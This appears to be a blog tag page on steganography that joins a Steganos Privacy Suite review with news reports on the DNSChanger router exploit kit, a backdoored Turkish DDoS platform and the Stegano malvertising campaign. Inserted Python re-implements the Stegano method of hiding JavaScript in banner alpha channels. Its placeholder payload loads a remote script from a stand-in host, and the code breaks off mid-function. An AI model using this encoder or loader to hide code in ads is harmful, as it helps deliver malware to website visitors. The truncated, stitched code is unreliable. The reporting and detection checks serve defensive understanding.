Wednesday, September 20, 2017

Tag: Steganography

At least three cyber espionage campaigns and several malware samples in recent months have employed this ancient technique, Kaspersky Lab says.
Today, a dangerous new trend is emerging: steganography is increasingly being used by actors creating malware and cyber-espionage tools. Most modern anti-malware solutions provide little, if any, protection against steganography, while any carrier in which a payload can be secretly embedded poses a potential threat.

Steganos Privacy Suite 18

If a website's massive data breach compromises your privacy, there's not much you can do. It's out of your hands. But that doesn't mean you're completely helpless. There's plenty you can do to protect your own privacy, things like encrypting your files, and protecting your passwords. Steganos Privacy Suite 18 brings together a variety of useful privacy-related tools. However, the quality of the tools varies, and the suite lacks some useful features found in competing products.

With most antivirus tools, security suites, and password managers, you pay a yearly subscription fee. That's not the case with Steganos. For $59.95 you can install it on up to five PCs and use it for as long as you like. The only thing you don't get is a free update to the next version.

Earlier editions of this product included VPN protection, but the current product lineup makes Steganos Online Shield VPN a separate product. As I write this, Steganos is running a promotion that gives you the VPN for free when you purchase the suite. Note, though, that PCMag's Max Eddy gave this VPN service just two out of five stars.

Getting Started with Steganos

After the quick, simple installation Steganos displays its main window. At the left is a three-by-three matrix of icons representing the suite's features: Safe, Portable Safe, Crypt & Hide, Password Manager, Private Favorites, E-Mail Encryption, Shredder, Trace Destructor, and Privacy. The suite is effectively a launch pad for these utilities.

The right-hand portion of the main window is a kind of security progress report. Just by installing the suite, you start with a 20 percent security level. Creating an encrypted safe for storing sensitive files gets you another 20 percent, and setting up the password manager raises it by another 20. Using the password manager's bonus ability to store private favorites adds 20 percent more. Configuring the Privacy components takes you to 100 percent. I like the way this simple report encourages full use of the product's features.

Standalone Products

Several components of the Steganos Privacy Suite are available as standalone products. I'll summarize my findings regarding those products. To get full details, please click the links to read my reviews.

Steganos Safe 18 lets you create any number of safes, which are encrypted storage containers for your sensitive files. You can create safes on your PC, on portable devices, or in your cloud storage accounts. When a safe is open, you use it exactly like any disk drive. When it's shut, its contents are completely inaccessible.

Steganos Safe is extremely easy to use, more so than most container-based encryption products. In addition, it offers some seriously sneaky techniques for hiding the very existence of your safes from prying eyes. For example, you can hide a fairly small safe inside an audio, video, or executable file. And the Safe in a Safe feature lets you dedicate a percentage of a visible safe for use as a discreet, invisible storage location, with its own separate password.

Along with the encryption tool, you also get Steganos Shredder, a secure deletion shredder utility. You can securely delete any file or folder by selecting Destroy from the right-click menu. With this tool you can also shred all of the free space on disk, effectively applying secure deletion to already-deleted files. It can also wipe any disk drive (except the active Windows drive) so thoroughly that a format is required when it's done.

Steganos Password Manager 18 handles the basic tasks of password capture and replay, and includes a password generator. Unlike most competing products, it doesn't directly handle syncing your passwords between devices; if you want syncing, you must connect to your existing cloud storage. You also get a limited ability to fill Web forms with personal data.

In testing, I couldn't get the password manager's Firefox extension to load. Also, some features worked in Chrome but not in Internet Explorer. If you get this password manager as part of the Steganos suite, you might as well use it. But if you're shopping for a standalone password manager, there are much better choices.

The two standalone Steganos products I've reviewed account for five of the suite's nine component icons. Password Manager and Private Favorites both correspond to Steganos Password Manager. Safe and Portable Safe are parts of Steganos Safe, as is Shredder. For the remainder of this review I'll focus on the rest of the privacy components.

Encrypt and Hide

The name Steganos comes from the term steganography, which is not the same as encryption. The aim of encryption is to ensure that others can't decipher your secrets. The aim of steganography is to conceal the fact that you have secrets. When you process a file through the suite's Crypt & Hide component and then shred the original, a hacker or snoop won't find any evidence that the sensitive data exists.

I don't know precisely how this tool processes files—it's not in the company's interest to reveal such information. But here's a simple example of how steganography could work to hide a file inside an image. First, picture the image as a list of numbers representing the exact color of each pixel. Now round all those numbers so they're even. That tiny change doesn't make a visible difference in the image. Convert your secret file into a stream of bits, and step through the list of the image's pixels, leaving the color number unchanged for zero bits and making it odd for one bits. You've hidden the file in a way that's completely recoverable, but the image doesn't look appreciably different.
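The even/odd scheme just described, worked through in Python as an added example (this is not the reviewer's code and says nothing about how Steganos actually works). The 4-byte length prefix is an assumption added so the extractor knows where the hidden data ends, and the carrier is a constructed list of channel values rather than a real image file; the last function shows the statistical tell a defender can look for.

```python
"""Least-significant-bit (LSB) steganography on a flat list of 0..255 channel values."""
import random

HEADER_BITS = 32  # assumed framing: 32-bit big-endian payload length (not in the review)


def bytes_to_bits(data: bytes):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def bits_to_bytes(bits):
    """Pack a list of bits back into bytes (any trailing partial byte is dropped)."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for b in bits[i:i + 8]:
            value = (value << 1) | b
        out.append(value)
    return bytes(out)


def capacity_bytes(carrier):
    """How many payload bytes fit: one bit per channel value, minus the header."""
    return max(0, (len(carrier) - HEADER_BITS) // 8)


def embed(carrier, secret: bytes):
    """Hide `secret` in the low bits of `carrier`, following the review's description."""
    payload_bits = list(bytes_to_bits(len(secret).to_bytes(4, "big") + secret))
    if len(payload_bits) > len(carrier):
        raise ValueError(
            f"carrier too small: need {len(payload_bits)} values, have {len(carrier)}"
        )
    # "Round all those numbers so they're even": clear the low bit. Rounding down
    # instead of to nearest avoids pushing 255 out of range.
    stego = [v & ~1 for v in carrier]
    # Zero bits leave the value even; one bits make it odd.
    for i, bit in enumerate(payload_bits):
        stego[i] |= bit
    return stego


def extract(stego):
    """Recover the hidden bytes: read the length header, then that many bytes of LSBs."""
    lsbs = [v & 1 for v in stego]
    length = int.from_bytes(bits_to_bytes(lsbs[:HEADER_BITS]), "big")
    body = lsbs[HEADER_BITS:HEADER_BITS + length * 8]
    if len(body) < length * 8:
        raise ValueError("truncated payload")
    return bits_to_bytes(body)


def odd_fraction(values):
    """Share of odd values. Natural image data sits near 0.5; a carrier processed as
    above is all-even wherever no payload bit landed, which is a detectable anomaly."""
    return sum(v & 1 for v in values) / len(values)


def make_carrier(n, seed=1):
    """Constructed stand-in for image data: n pseudo-random channel values."""
    rng = random.Random(seed)
    return [rng.randrange(256) for _ in range(n)]


if __name__ == "__main__":
    carrier = make_carrier(4096)
    secret = b"MyWorldTakeover.docx"
    stego = embed(carrier, secret)
    print("capacity (bytes):", capacity_bytes(carrier))
    print("recovered:", extract(stego))
    print("max per-value change:", max(abs(a - b) for a, b in zip(carrier, stego)))
    print("odd fraction, original:", round(odd_fraction(carrier), 3))
    print("odd fraction, unused tail of stego:", odd_fraction(stego[HEADER_BITS + len(secret) * 8:]))
```

Every value moves by at most 1, which is why the image looks unchanged, but the all-even tail is exactly the kind of statistical fingerprint steganalysis tools test for.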

Steganos can use BMP, WAV, or JPG files as carriers for encrypted data. The help system advises using a carrier file at least 20 times the size of the encrypted data. You can also use it to create encrypted archives without hiding them, much as you'd do with a ZIP archive utility. Note, though, that the archives created by Steganos use the proprietary EDF format, not the standard ZIP format.

To create a simple encrypted archive, drag files and folders onto the Crypt & Hide dialog, or browse to locate the desired items. You can also enter a text description of the contents. Clicking Save lets you define the name and location for the resulting EDF file. The password entry dialog is the same as that used by Steganos Safe and Steganos Password Manager. It rates password strength as you type, with the option to use a virtual keyboard, or to define the password by clicking a sequence of pictures.

To create an encrypted file and also hide it, follow precisely the same procedure, but click the Hide button instead of the Save button, and choose a BMP, WAV, or JPG file as carrier. That's it. Your secret files are hidden within the chosen carrier. Don't believe it? Launch Crypt & Hide again, choose Open, and select your carrier. Once you enter the password, your files are back. Of course you must use the shredder to destroy the originals.


As you use your computer and browse the Web, you leave behind traces of what you've been doing. Sure, you hid your secret plans using Crypt & Hide, but if MyWorldTakeover still shows up in the list of recent documents, you're busted. In a similar way, your browsing history may reveal way too much about what you've been researching. That's where TraceDestructor comes in.

TraceDestructor clears various types of browsing traces from Chrome, Firefox, Internet Explorer, and Microsoft Edge. For Edge, it just clears cookies and cached files. For the others, it can also wipe out such things as history, autocomplete data, and passwords. It can also empty the Recycle Bin and eliminate Windows temporary files, recently used file lists, and other traces.

Cleaning up traces doesn't take long. When the process has finished, Steganos advises you to log off and on again, for full cleanup. Simple!

Privacy Settings

Clicking the Privacy icon brings up a simple settings dialog with four on/off switches, all off by default. I couldn't test Webcam protection, because my virtual machine test systems simply don't have webcams. In addition, every time I opened Privacy Settings I got a notification from Windows that the webcam privacy component crashed.

Webcam protection does nothing but deactivate your webcam, so you must turn that protection off if you want to use the cam for videoconferencing. A similar feature in ESET Internet Security 10 lets you disable the webcam in general but enable specific programs. That would prevent webcam spying while still letting you Skype, for example.

Kaspersky Total Security also offers webcam blocking for all but permitted programs. It extends similar protection to the microphone, to head off the possibility of a snoop listening in on your activities.

Internet advertisers work hard to profile your personal surfing habits, so they can target ads based on your interests. If you've ever bought (or looked at) a product on one site and then seen an ad for that product on a different site, you've seen this process in action. You can set your browser to send a Do Not Track header with each request, but sites aren't compelled to obey this header. The Prevent tracking option in Steganos filters out tracking activity before it reaches the browser.

Some trackers skip the usual techniques for tying together all data about your online activity, instead trying to create a fingerprint of your devices and activity, including precise data about the browsers you use. Steganos lets you replace your actual browser details with a generic fake set, to anonymize your browser type. Finally, you can choose to block advertisements altogether. The Block ads, Prevent tracking, and Anonymize browser type settings are simple on/off switches.

In testing, these three privacy elements initially didn't work. I confirmed this using various online tests. I reinstalled the product, to no avail. I installed it on a physical system, thinking that it might be incompatible with running in a virtual machine. Here, too, the privacy elements just didn't work. Tech support determined this was due to the absence of a proxy process that provides all three types of filtering.

Going back and forth with tech support, I determined that the installer failed to create a necessary configuration file. Even after I manually copied the config file that tech support supplied, it did not launch the proxy process. After more back and forth, I got the proxy running on both systems. It seemed to be running smoothly on the physical system, but its output on the virtual system contained many error messages. That being the case, I focused on the physical system.

There's no way to tell if the Prevent tracking feature is working, but Anonymize browser type should change the user agent string that your browser sends to every website. It did not do so. And although the filter's output log contained tons of ad blocking reports, the ads visibly weren't blocked.

The worst thing about this component is that even when its proxy failed to load, it didn't display any kind of error message. The privacy features work silently, so you'd have no idea that they weren't functioning, unless you noticed its failure to block ads.

There is one icon I haven't covered, E-Mail Encryption. I've skipped this one for several reasons. First, it is not a Steganos product; it's from another company, MyNigma. Second, on a PC it only functions as an Outlook plug-in, and my test systems don't have Outlook. Third, it only works to encrypt email between other users of MyNigma, so it's not useful for general-purpose encrypted communication.

Another Take on Privacy

Abine Blur is another suite of tools aimed at protecting your privacy. Its active Do Not Track component goes way beyond just sending the DNT header, which websites can ignore. Furthermore, unlike Steganos, it makes its activity visible. It includes a simple password manager, but goes beyond Steganos by offering a safety report that flags weak and duplicate passwords.

Blur protects your privacy by masking email accounts, credit cards, and (on a smartphone) phone numbers. Suppose you make a purchase from a merchant using a masked email account, and a masked credit card. Mail from the merchant reaches your inbox, but you can delete the masked account if it starts getting spam. And a merchant who doesn't have your real credit card number can't sell the card data or overcharge you. Read my review for a full explanation.

Blur doesn't block ads, and it doesn't include file encryption, but all of its components are directly aimed at protecting your privacy. Even if you do install the Steganos suite, consider trying Blur's free edition for additional protection. Note that if you do opt for a $39-per-year premium subscription, you can use Blur on all your devices.

Do You Already Have It?

You may also find that you've already got significant privacy protection courtesy of your security suite. For example, Kaspersky and AVG Internet Security include an active Do Not Track system, like what Blur offers, and Kaspersky can block banner ads. Webcam protection in Kaspersky and ESET goes farther than what you get with Steganos.

As for encrypted storage, the core of Steganos Privacy Suite, you can find a similar feature in many suites, among them McAfee LiveSafe, Bitdefender, Kaspersky, and Trend Micro. Admittedly, none of the suites build out this feature into the comprehensive encryption system that is Steganos Safe.

As for password management, it's becoming a common bonus feature in larger suites. Webroot includes a version based on award-winning LastPass, and McAfee comes with all the multi-factor authentication glory of True Key. Symantec Norton Security Premium, Trend Micro, ESET, Kaspersky, and Bitdefender are among the other suites with a password manager built right in.

Before you purchase a set of privacy tools, check to see what you already have right in your existing security suite.

A Mixed Bag

Steganos Safe is easier to use than other container-based encryption programs, and has some nifty features to both encrypt and hide your files. However, Steganos Password Manager lacks advanced features, and some of its features didn't work in testing. The Crypt & Hide component is a kick, as it truly hides your secrets, leaving no trace. But the browser-related privacy filters just didn't work in testing. Steganos Privacy Suite is a mixed bag, for sure.

There aren't many utilities specifically devoted to privacy. Abine Blur Premium remains our Editors' Choice in this interesting field. I look forward to seeing more competition in the specific area of privacy protection.



Software nasty is packed with exploits for vulnerabilities in home broadband boxes

Malware that spreads via evil web ads and menaces broadband routers has been discovered – and it's going to be particularly horrible for small business and home internet users, which it targets.

This latest variant of the years-old DNSChanger nasty, just spotted by Californian infosec biz Proofpoint, works like this: some JavaScript code is hidden in advertisements placed on mainstream websites via ad networks. The code – which prefers Chrome on Windows and Android – checks for the local IP address of the browser visiting the site using a WebRTC request to a Mozilla STUN server. If the target isn't in the desired IP range for the attacker, a legitimate advert is fetched and displayed, and nothing further happens.

If the IP address is within range, the JS code downloads a bogus ad in the form of a PNG image, and extracts HTML from the comment field of the picture. The HTML is rendered in the page and it redirects the browser to another website that hosts the DNSChanger Exploit Kit. Evil JavaScript on that webpage then fetches an AES key, concealed in an image using steganography, that is used to decrypt a separate payload that contains more code, a bunch of default usernames and passwords used in broadband routers, and 166 fingerprints used to identify the victim's router.

Next, the exploit kit, running within the browser using the decrypted data, tries to figure out the router being used from the list of possible fingerprints. If there's a match, it fetches the necessary code to run to exploit vulnerabilities in that particular gateway to hijack it. If there is no match, it tries out all the default login credentials, and if those don't work, it tries to run a load of exploits against common vulnerabilities in devices.

The ultimate aim is to connect to the router on the local network from the victim's browser and abuse security shortcomings – such as known default passwords or programming blunders – to commandeer the gateway and change its DNS settings to rogue name servers. Then when computers join the local network, they may, depending on their configuration, pick up the bad DNS settings from the router and run domain-name lookups through hacker-controlled name servers. Whoever controls those servers can make people's browsers connect to malevolent systems masquerading as legit websites that steal login information; inject more malware onto the victim's PCs by redirecting downloads; serve them dodgy ads rather than real ones the browser was supposed to display; and so on.

Proofpoint's diagram showing the infection path (figure not reproduced).

Some of the infection exploits also start up vulnerable services on the routers that nasties like the Mirai botnet can attack to also joyride the gateway. Devices known to be vulnerable to DNSChanger EK include:

D-Link DSL-2740R
COMTREND ADSL Router CT-5367 C01_R12
NetGear WNDR3400v3 (and likely other models in this series)
Pirelli ADSL2/2+ Wireless Router P.DGA4001N
Netgear R6200

"When attackers control the DNS server on a network, they open up the possibility of carrying out a wide range of malicious actions on devices connecting to the network," Proofpoint said last week. "These can include banking fraud, man-in-the-middle attacks, phishing, ad fraud, and more. In this case, the DNSChanger exploit kit allows attackers to leverage what is often the only DNS server on a SOHO network – the internet router itself. In general, avoiding these attacks requires router manufacturers to regularly patch their firmware and users to regularly apply these patches."

At present, it looks as though the DNSChanger masterminds are purely looking to reroute connections to legitimate advertising brokers to other networks, via the hijacked DNS settings, thus forcing browsers to display adverts the crooks can make money off. Fogzy and TrafficBroker appear to be getting the most of this redirected traffic at the moment, and both companies have been advised that there's something dodgy going on. We were told on Monday that Fogzy has now blocked the redirection.

"Unfortunately, there is no simple way to protect against these attacks. Applying the latest router updates remains the best way to avoid exploits," Proofpoint said. Changing the username and password for the admin interface is also a good idea, as is logging out of the router when you're not fiddling with its settings. Some gateways can still be vulnerable even if you've taken these precautions.

"Changing the default local IP range, in this specific case, may also provide some protection. Neither of these solutions, though, is a typical action performed by average users of SOHO routers," the biz continued.
As you read these words, malicious ads on legitimate websites are targeting visitors with malware.

But that malware doesn't infect their computers, researchers said.
Instead, it causes unsecured routers to connect to fraudulent domains. Using a technique known as steganography, the ads hide malicious code in image data.

The hidden code then redirects targets to webpages hosting DNSChanger, an exploit kit that infects routers running unpatched firmware or are secured with weak administrative passwords. Once a router is compromised, DNSChanger configures it to use an attacker-controlled domain name system server.

This causes most computers on the network to visit fraudulent servers, rather than the servers corresponding to their official domain. Patrick Wheeler, director of threat intelligence for security firm Proofpoint, told Ars:

"These findings are significant because they demonstrate clearly that ubiquitous and often-overlooked devices are being actively attacked, and once compromised, these devices can affect the security of every device on the network, opening them up to further attacks, pop-ups, malvertising, etc. Thus, the potential footprint of this kind of attack is high and the potential impact is significant."

Lots of moving parts

The ads first check if a visitor's IP address is within a targeted range, a behavior that is typical of many malvertising campaigns, which aim to remain undetected for as long as possible.
If the address isn't one the attackers want to target, they serve a decoy ad with no exploit code in it.
In the event the IP address is one the attackers want to infect, they serve a fake ad that hides exploit code in the metadata of a PNG image.

The code, in turn, causes the visitor to connect to a page hosting DNSChanger, which once again checks the visitor's IP address to ensure it's within the targeted range. Once the check passes, the malicious site serves a second image with the router exploit code concealed inside it.

DNSChanger attack chain (figure not reproduced). Proofpoint

"This attack is determined by the particular router model that is detected during the reconnaissance phase," a Proofpoint researcher who uses the moniker Kafeine wrote in a blog post. "If there is no known exploit, the attack will attempt to use default credentials." In the event there are no known exploits and no default passwords, the attack aborts.

A fake DNSChanger ad (figure not reproduced). Proofpoint

DNSChanger uses a set of real-time communications protocols known as WebRTC to send so-called STUN server requests used in VoIP communications.

The exploit is ultimately able to funnel code through the Chrome browser for Windows and Android to reach the network router.

The attack then compares the accessed router against 166 fingerprints of known vulnerable router firmware images. Proofpoint said it wasn't possible to name all the vulnerable routers, but a partial list includes:

D-Link DSL-2740R
COMTREND ADSL Router CT-5367 C01_R12
NetGear WNDR3400v3 (and likely other models in this series)
Pirelli ADSL2/2+ Wireless Router P.DGA4001N
Netgear R6200

The malicious ads are delivered in waves lasting several days at a time through legitimate ad networks and displayed on legitimate websites. Proofpoint's Wheeler said there isn't enough data to know how many people have been exposed to the ads or how long the campaign has been running, but he said the attackers behind it have previously been responsible for malvertisements that hit more than 1 million people a day.

The campaign was still active at the time this post was being prepared. Proofpoint didn't identify any of the ad networks or websites delivering or displaying the malicious ads. As Ars reported last week, a similar malvertising campaign—images with hidden code that double-check IP addresses—also reached more than 1 million people a day. Proofpoint said the two campaigns aren't related. DNS servers translate domain names such as arstechnica.com into IP addresses such as, which computers need to find and access the site.

By changing router settings to use an attacker-controlled server, DNSChanger can cause most, if not all, connected computers to connect to impostor sites that look just like the real ones.
So far, the malicious DNS server used by DNSChanger appears to be falsifying IP addresses to divert traffic from large ad agencies in favor of ad networks known as Fogzy and TrafficBroker.

But the server could be updated at any time to falsify lookups for Gmail.com, bankofamerica.com, or any other site.
In such a scenario, HTTPS protections wouldn't flag the impostor. The best defense against these attacks is to ensure routers are running the latest available firmware and are protected with a long password that's generated randomly or through a technique known as diceware.

Disabling remote administration and changing its default local IP address can also be helpful.
Attackers are targeting more than 166 router models with an exploit kit called DNSChanger that is being distributed via malvertising. Researchers at Proofpoint said the exploit kit is unique because the malvertising component of the attack doesn't target browsers, but rather a victim's router. Some of the vulnerable routers include specific models made by D-Link, Netgear and those that serve the SOHO market such as Pirelli and Comtrend, according to Proofpoint, which published its research Tuesday. Owners of routers vulnerable to DNSChanger are urged to update their equipment's firmware. The router vulnerabilities exploited by DNSChanger are not to be confused with the vulnerabilities found in Netgear routers last week that could allow an attacker to gain root access to devices remotely.

DNSChanger attacks begin with hackers buying and placing ads on mainstream websites.

Those ads contain malicious JavaScript code that can reveal a user's local IP address by triggering what is called a WebRTC request to a Mozilla STUN server (stun.services.mozilla[.]com). WebRTC is a protocol for web communication.
STUN (Session Traversal Utilities for NAT) servers send a ping back that contains the IP address and port of the client, as seen from the server's perspective.

The local and public IP addresses of the user can be gleaned from these requests via the JavaScript. Once attackers establish a target’s local IP address they try to ascertain whether the target is worth attacking.
If not, a victim is shown a benign ad.

Desirable targets receive a fake ad in the form of a PNG image. Proofpoint said JavaScript is then used to extract HTML code from the comment field on the PNG file and redirects victims to the landing page of the DNSChanger EK. Next, DNSChanger uses Chrome to load multiple functions including an AES key concealed with steganography in a small image.

The AES key is used to cloak traffic and decrypt router fingerprints used to determine if a target is using a vulnerable model. "Once it performs the reconnaissance functions, the browser will report back to the DNSChanger EK which returns the proper instructions to perform an attack on the router," Proofpoint said. "The Chrome browser is functioning correctly, but the router has vulnerabilities that can be exploited.

Because browsers must talk with routers through which clients connect to the Internet, legitimate traffic/connections can be exploited to change the router's DNS settings," Patrick Wheeler, director of threat intelligence at Proofpoint, said. "The browser is simply doing what it is supposed to, talking with the router and, ultimately, receiving DNS information from it."

In cases where the router is not vulnerable, attackers will use DNSChanger to attempt to use default credentials to change DNS entries.
If the vulnerability is present, attackers will use the known router exploits to modify the DNS entries in the router and also try to make administration ports available from external addresses for additional attacks. The goal is to change DNS records on routers so cybercriminals can steal traffic from large web ad agencies such as Propellerads, Popcash and Taboola. "At the time of our examination, they were redirecting the traffic to Fogzy (a.rfgsi[.]com) and TrafficBroker," Proofpoint wrote. Wheeler said there are also indications that DNSChanger is being used in man-in-the-middle attacks. He added, "We do not rule out the possibility of future malicious actions depending on the motivation or goals of those controlling the exploit kit."

Mitigation efforts include applying the latest manufacturer router updates. Proofpoint also recommends a number of ways to tighten security to lessen the likelihood of an attack.

Those recommendations include changing the default local IP range on routers, disabling remote administration features on SOHO routers and using ad-blocking browser add-ons.
A Turkish hacking crew is luring participants to join its DDoS platform to compete with peers to earn redeemable points that are exchangeable for hacking tools and click-fraud software. The goal, security researchers say, is to “gamify” DDoS attacks in order to attract a critical mass of hackers working toward a unified goal. The hacking platform is called Surface Defense and is being promoted in Turkish-language Dark Web forums including Turkhackteam and Root Developer, according to Forcepoint Security Labs, the security firm that first uncovered and reported the DDoS platform. Promoters of Surface Defense are actively recruiting Turkish hackers that may be sympathetic to Turkish nationalist beliefs, Forcepoint believes. Targets of the DDoS attacks range from the Kurdistan Workers Party, German Christian Democratic Party and the Armenian National Institute website in Washington D.C., said Carl Leonard, principal security analyst at Forcepoint. “It’s unclear if those behind the Surface Defense platform are indeed politically motivated or they are simply using politics as a marketing tool to lure hackers into their network.” Forcepoint believes that this is the first time a hacker has “gamified” a hacking platform to the extent that participants compete against one another and can compare scores and redeem points for rewards on a single service. Hackers are recruited via Turkish Dark Web hacker forums, and to participate in the program they must download the Surface Defense collaboration program and register. Surface Defense runs locally on a computer. Users congregate online within the program and can communicate and compare points they earn. Next, participants are required to download a DDoS attack tool called Sledgehammer. Sledgehammer is software that comes preconfigured to perform HTTP-based Slowloris-type DDoS assaults against 24 preselected sites determined by the software’s author. 
“Those who appear on this target list appear to be there for political reasons… Users receive a point for every 10 minutes they attack one of the websites,” according to Forcepoint, which on Wednesday released its report. Sledgehammer utilizes the PC’s resources to conduct the attack, routing DDoS traffic through the anonymizing Tor service. Currently, there is little evidence that the hacking group has successfully knocked a targeted site offline. “We believe that those behind Sledgehammer are in the participant acquisition phase and are trying to reach critical mass,” Leonard said. Threatpost contacted one Sledgehammer target, the Armenian National Institute, which said it was unaware of any recent attempted site disruptions. Once a participant achieves a certain level of points they are awarded an unlocked version of Sledgehammer that they can customize and re-distributed to conduct DDoS attacks themselves. The zinger for participating hackers, Forcepoint said, is that Sledgehammer has an unadvertised backdoor that allow the program’s authors to access computers running the DDoS software. According to researchers: “The backdoor is a very small Trojan and its sole purpose is to download, extract and execute another .NET assembly from within a bitmap image. It also downloads a secondary ‘guard’ component which it installs as a service. This ‘guard’ component ensures that if the backdoor is deleted then it will be re-downloaded and also installed as a service.” The bitmap image downloaded by the backdoor, using steganography to hide code, contains the embedded .NET assembly. “The first pixel’s ARGB value indicates the size of the payload, and the rest of the image contains the payload itself,” Forcepoint said. Hackers are also rewarded with a “Trojanized Adfly click fraud bot that includes code snippets for generating revenue via the Adfly,” Forcepoint said. 
Adfly is a legitimate web page redirection service that shows interstitial ads and allows people to generate revenue via clicks. Forcepoint said that the “click fraud” bots are specially crafted to generate revenue on pay-to-click sites such as Ojooo, PTCFarm and Neobux. Researchers said it is unclear how hackers leverage the malicious Adfly version to make money, if at all. Leonard said there are strong indicators that the hacked version of the Adfly component does not work. However, according to Forcepoint, the Adfly bot also contains the same backdoor as the DDoS tool Sledgehammer.

Leonard believes the authors behind the platform go by the handle “Mehmet.” He said two YouTube channels tied to a user named Mehmet contain Sledgehammer tutorials and information on the Root Developer hacker forum. “Surface Defense creates a very unique hacker community we have never seen before. This system has been very cleverly designed to appeal to participants with multiple motivations. But ultimately the participants can be backdoored themselves and become a victim to attack,” Leonard said.
Millions of people visiting mainstream websites over the past two months have been exposed to a novel form of malicious ads that embed attack code in individual pixels of the banners. Researchers from antivirus provider Eset said "Stegano," as they've dubbed the campaign, dates back to 2014.

Beginning in early October, its unusually stealthy operators scored a major coup by getting the ads displayed on a variety of unnamed reputable news sites, each with millions of daily visitors.

Borrowing from the word steganography—the practice of concealing secret messages inside a larger document, which dates back to at least 440 BC—Stegano hides parts of its malicious code in parameters controlling the transparency of pixels used to display banner ads. While the attack code alters the tone or color of the images, the changes are almost invisible to the untrained eye.

Figure (Eset): left, clean picture; middle, picture with malicious content; right, malicious version enhanced for illustrative purposes.

The malicious script is concealed in the alpha channel that defines the transparency of pixels, making it extremely difficult for even sharp-eyed ad networks to detect.

After verifying that the targeted browser isn't running in a virtual machine or alongside other types of security software often used to detect attacks, the script redirects the browser to a site that hosts three exploits for now-patched Adobe Flash vulnerabilities. "We can say that even some of the other major exploit kits, like Angler and Neutrino, are outclassed by the Stegano kit in terms of referrals—the websites onto which they managed to get the malicious banners installed," Eset researchers wrote in a report published Tuesday. "We have observed major domains, including news websites visited by millions of people every day, acting as 'referrers' hosting these advertisements. Upon hitting the advertising slot, the browser will display an ordinary-looking banner to the observer. There is, however, a lot more to it than advertising."

The ads promoted applications calling themselves "Browser Defence" and "Broxu" and targeted people who visited the news sites using Internet Explorer.

The script concealed in the pixels exploited a now-patched IE vulnerability indexed as CVE-2016-0162 to obtain details about the visitors' computers.

Among other things, the script checked for the presence of packet capture, sandboxing, and virtualization software and a variety of security products. Machines that didn't exhibit signs of the software and contained a vulnerable version of Flash were then redirected to the exploit site, which would serve one of two families of malware.

The Ursnif family is made up mainly of modules for stealing e-mail credentials, logging keystrokes, taking screenshots and videos, and acting as a backdoor.

The Ramnit variety of malware offers most of the same capabilities and mainly targets the banking industry. The attackers took extra pains to ensure the machines being infected didn't belong to security-savvy people who might detect what was happening.
In addition to a check carried out by the script embedded in the ad, a separate check was carried out by the exploit server before going through with the attack.

The Eset report didn't identify any of the sites that delivered the malicious ads.
It did say that the people exposed were concentrated in Canada, the UK, Australia, Spain, and Italy, which are the countries served by the affected ad networks.

Earlier versions of the campaign from 2014 and 2015 targeted people in the Netherlands and the Czech Republic.

The Flash vulnerabilities exploited included CVE-2015-8641, CVE-2016-1019, and CVE-2016-4117.

Update: To execute the hidden payload, the malicious ads load a heavily modified version of Countly, an open-source package for measuring website traffic.

That JavaScript extracts the hidden code out of the image and executes it.

Because there's nothing per se malicious in the JavaScript, ad networks fail to detect what's happening. Referring to an ad located at hxxps://browser-defence.com/ads/s/index.html?w=160&h=600, Eset researchers described it this way: The index.html loads countly.min.js and feeds the initial parameters to the script.

This countly, however, is not the stock library of the open source mobile & web analytics platform you would download from github.
It is a heavily modified and obfuscated version, with some parts deleted and interlaced with custom code.

This custom code is responsible for an initial environment check.
Information about the environment is reported back to the server as XOR-encrypted parameters of the 1x1 gif file, as captured in the image above. The following information about the environment is sent:

systemLocale^screenResolution^GMT offset^Date^userAgent^pixelRatio

After that, the script will request the advertising banner.

The server will reply with either a clean or a malicious version, most likely also depending on the previous environment check. The script will then attempt to load the banner and read the RGBA structure.
If a malicious version of the image was received, it will decode some Javascript and variables from the alpha channel. The steganography is implemented in the following way: Two consecutive alpha values represent the tens and ones of a character code, encoded as a difference from 255 (the full alpha). Moreover, in order to make the change more difficult to spot by naked eye, the difference is minimized using an offset of 32.

Researchers from Eset competitor Malwarebytes have published their own write-up of the campaign, which they are calling AdGholas. Despite targeting only people using IE and unpatched versions of Flash, Stegano is noteworthy for its concealment of exploit code in the pixels of the banner ads.
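The alpha-channel scheme Eset describes, as an added example written for this page (it is neither Eset's code nor the attackers' modified countly.min.js): each character code has 32 subtracted, the result is split into a tens digit and a ones digit, and each digit is stored as 255 minus the digit in the alpha byte of one pixel, so no alpha ever drops below 246 and the banner stays visually opaque. The six-digit length prefix, the constructed banner and the placeholder script are my own additions; the report does not say how the real decoder found the end of the script. The near_opaque_pixels check at the end is the kind of test an ad network could run on uploaded creatives, since a legitimate opaque banner has no pixels in that narrow alpha band.

```python
OFFSET = 32        # subtracted from every character code before it is split into digits
FULL_ALPHA = 255   # an untouched pixel is fully opaque; a digit d is stored as 255 - d
LEN_DIGITS = 6     # my own framing (assumption): the script length, as six decimal digits, comes first

# Constructed, benign placeholder for the script an ad would hide; one line, printable ASCII only.
SAMPLE_SCRIPT = ("var s=document.createElement('script');"
                 "s.src='https://ads.example.invalid/x.js';document.head.appendChild(s);")


def _digit_alphas(number: int, digits: int) -> list:
    """Alpha values for a zero-padded decimal number, one digit per pixel."""
    return [FULL_ALPHA - int(d) for d in str(number).zfill(digits)]


def hide_script(rgba: bytes, script: str) -> bytearray:
    """Return a copy of an RGBA buffer (4 bytes per pixel) with `script` stored in the
    alpha bytes: per character, two pixels hold 255 - tens and 255 - ones of (code - 32).
    Only character codes 32..131 fit in two decimal digits, so a script containing
    newlines or tabs is rejected rather than silently corrupted."""
    if len(script) >= 10 ** LEN_DIGITS:
        raise ValueError("script too long for the length prefix")
    alphas = _digit_alphas(len(script), LEN_DIGITS)
    for ch in script:
        code = ord(ch) - OFFSET
        if not 0 <= code <= 99:
            raise ValueError(f"character {ch!r} (code {ord(ch)}) cannot be encoded")
        tens, ones = divmod(code, 10)
        alphas += [FULL_ALPHA - tens, FULL_ALPHA - ones]
    if len(alphas) > len(rgba) // 4:
        raise ValueError("image too small for this script")
    out = bytearray(rgba)
    for i, a in enumerate(alphas):
        out[i * 4 + 3] = a                      # only the alpha byte of pixel i changes
    return out


def recover_script(rgba: bytes) -> str:
    """What the modified countly.min.js had to do: read the alpha channel back into text."""
    alphas = rgba[3::4]
    length = int("".join(str(FULL_ALPHA - a) for a in alphas[:LEN_DIGITS]))
    chars = []
    for i in range(length):
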